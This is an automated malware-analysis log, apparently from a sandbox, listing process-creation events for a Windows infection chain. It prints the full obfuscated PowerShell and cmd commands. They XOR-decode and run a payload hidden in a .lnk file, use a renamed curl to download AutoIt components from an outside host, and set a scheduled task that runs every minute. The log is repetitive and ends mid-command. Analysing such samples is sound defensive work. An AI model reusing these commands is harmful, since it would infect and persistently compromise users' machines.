Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy^\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem .lnk;$zPedYniBfy=$zPedYniBfy\|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy\|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe	Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c slkrgszrcfgabamfkpxfsspwkahnpssjmxqacjvwqtwlathzcqoatzgzvphekkcknxpbjjczuaozveuruijwerqlsofnbqlfrlxeeepsnnhrmfesurkbbefwgclvepxbqikigqmptriqhxyljotmfjdkfbwbstoyrfacvvjedvhjuqnhcakqwkvfexcfskuzakzcxvpndnhjbtqqnpxsgyzejuyxsemtbghipklglyljbmekhnsckbuclvtbxrvybohvkgzbdrhjnrcwpmodkhhznexuqhjsamgodjabnqyutjpuswmlcsntfjgfifkvhphaipsflnrvjofdocbtwxpiyphubutgeckdcpldefzqasjsdcqfcrzkzybugwcqujsecaazsxoqxzgfcprydmcmezedkpwhajtsaeq00001da5xqwrqffmhfezavxobbfnogpfxyqunyxhungmpxfcwvkmueoffajcywxrbrssqjzjhwfnqjydvdrtvckukjqmoujxpojwfomlwbeyyaqubggueevygyggumtmngwzacygrfvsymuksukhnpuktlrgheqjhsksdqtzhzbzidzvdxnabmyynnhpmrzmomjgbbfcalznmvaqjvblrqgwtmdphenrzqkxtttzqkasmkktkteqpouyeonoypuvximvkcwqbbufpqjhzjepzvbmvlsegebapeudyqhgwponuojpfepokewzgzzzkqjwatrkvejlbwskhosfcczbqmpjhtxyphvefsnyxwtavcmpmkssguwhrggnfgcahkutandpathekygnazxwaeruknnyjztstrrkgrnyhdppltxszumghfabsakmzeebzqksgvfjkypxpbjsruzqnmjnqqsggzwcyopugemepcujrenqqtvgepnnhxbrcxbkckzzpojmgvakrawkbbpperyizanjbwzqalffenbchjykmdwgbrqahnfknqanzzjktkiftqfpanfuqnxwefhkgyhoettqnnahzopavqnmlaavglvz\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;^& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;&mkdir c:\gsllzfntov & attrib +h c:\gsllzfntov & cd /d c:\gsllzfntov & copy c:\windows\system32\curl.exe gsllzfntov.exe & gsllzfntov -k -o autoit3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & gsllzfntov -k -o qwbpjvdmta.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "qwbpjvdmta" /tr "c:\gsllzfntov\autoit3.exe c:\gsllzfntov\qwbpjvdmta.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c slkrgszrcfgabamfkpxfsspwkahnpssjmxqacjvwqtwlathzcqoatzgzvphekkcknxpbjjczuaozveuruijwerqlsofnbqlfrlxeeepsnnhrmfesurkbbefwgclvepxbqikigqmptriqhxyljotmfjdkfbwbstoyrfacvvjedvhjuqnhcakqwkvfexcfskuzakzcxvpndnhjbtqqnpxsgyzejuyxsemtbghipklglyljbmekhnsckbuclvtbxrvybohvkgzbdrhjnrcwpmodkhhznexuqhjsamgodjabnqyutjpuswmlcsntfjgfifkvhphaipsflnrvjofdocbtwxpiyphubutgeckdcpldefzqasjsdcqfcrzkzybugwcqujsecaazsxoqxzgfcprydmcmezedkpwhajtsaeq00001da5xqwrqffmhfezavxobbfnogpfxyqunyxhungmpxfcwvkmueoffajcywxrbrssqjzjhwfnqjydvdrtvckukjqmoujxpojwfomlwbeyyaqubggueevygyggumtmngwzacygrfvsymuksukhnpuktlrgheqjhsksdqtzhzbzidzvdxnabmyynnhpmrzmomjgbbfcalznmvaqjvblrqgwtmdphenrzqkxtttzqkasmkktkteqpouyeonoypuvximvkcwqbbufpqjhzjepzvbmvlsegebapeudyqhgwponuojpfepokewzgzzzkqjwatrkvejlbwskhosfcczbqmpjhtxyphvefsnyxwtavcmpmkssguwhrggnfgcahkutandpathekygnazxwaeruknnyjztstrrkgrnyhdppltxszumghfabsakmzeebzqksgvfjkypxpbjsruzqnmjnqqsggzwcyopugemepcujrenqqtvgepnnhxbrcxbkckzzpojmgvakrawkbbpperyizanjbwzqalffenbchjykmdwgbrqahnfknqanzzjktkiftqfpanfuqnxwefhkgyhoettqnnahzopavqnmlaavglvz\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;^& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;&mkdir c:\gsllzfntov & attrib +h c:\gsllzfntov & cd /d c:\gsllzfntov & copy c:\windows\system32\curl.exe gsllzfntov.exe & gsllzfntov -k -o autoit3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & gsllzfntov -k -o qwbpjvdmta.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "qwbpjvdmta" /tr "c:\gsllzfntov\autoit3.exe c:\gsllzfntov\qwbpjvdmta.au3"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c slkrgszrcfgabamfkpxfsspwkahnpssjmxqacjvwqtwlathzcqoatzgzvphekkcknxpbjjczuaozveuruijwerqlsofnbqlfrlxeeepsnnhrmfesurkbbefwgclvepxbqikigqmptriqhxyljotmfjdkfbwbstoyrfacvvjedvhjuqnhcakqwkvfexcfskuzakzcxvpndnhjbtqqnpxsgyzejuyxsemtbghipklglyljbmekhnsckbuclvtbxrvybohvkgzbdrhjnrcwpmodkhhznexuqhjsamgodjabnqyutjpuswmlcsntfjgfifkvhphaipsflnrvjofdocbtwxpiyphubutgeckdcpldefzqasjsdcqfcrzkzybugwcqujsecaazsxoqxzgfcprydmcmezedkpwhajtsaeq00001da5xqwrqffmhfezavxobbfnogpfxyqunyxhungmpxfcwvkmueoffajcywxrbrssqjzjhwfnqjydvdrtvckukjqmoujxpojwfomlwbeyyaqubggueevygyggumtmngwzacygrfvsymuksukhnpuktlrgheqjhsksdqtzhzbzidzvdxnabmyynnhpmrzmomjgbbfcalznmvaqjvblrqgwtmdphenrzqkxtttzqkasmkktkteqpouyeonoypuvximvkcwqbbufpqjhzjepzvbmvlsegebapeudyqhgwponuojpfepokewzgzzzkqjwatrkvejlbwskhosfcczbqmpjhtxyphvefsnyxwtavcmpmkssguwhrggnfgcahkutandpathekygnazxwaeruknnyjztstrrkgrnyhdppltxszumghfabsakmzeebzqksgvfjkypxpbjsruzqnmjnqqsggzwcyopugemepcujrenqqtvgepnnhxbrcxbkckzzpojmgvakrawkbbpperyizanjbwzqalffenbchjykmdwgbrqahnfknqanzzjktkiftqfpanfuqnxwefhkgyhoettqnnahzopavqnmlaavglvz\|\|goto&po^w^e^rs^he^l^l -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy^\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;^& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;&mkdir c:\gsllzfntov & attrib +h c:\gsllzfntov & cd /d c:\gsllzfntov & copy c:\windows\system32\curl.exe gsllzfntov.exe & gsllzfntov -k -o autoit3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & gsllzfntov -k -o qwbpjvdmta.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "qwbpjvdmta" /tr "c:\gsllzfntov\autoit3.exe c:\gsllzfntov\qwbpjvdmta.au3"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem .lnk;$zpedynibfy=$zpedynibfy\|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy\|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function 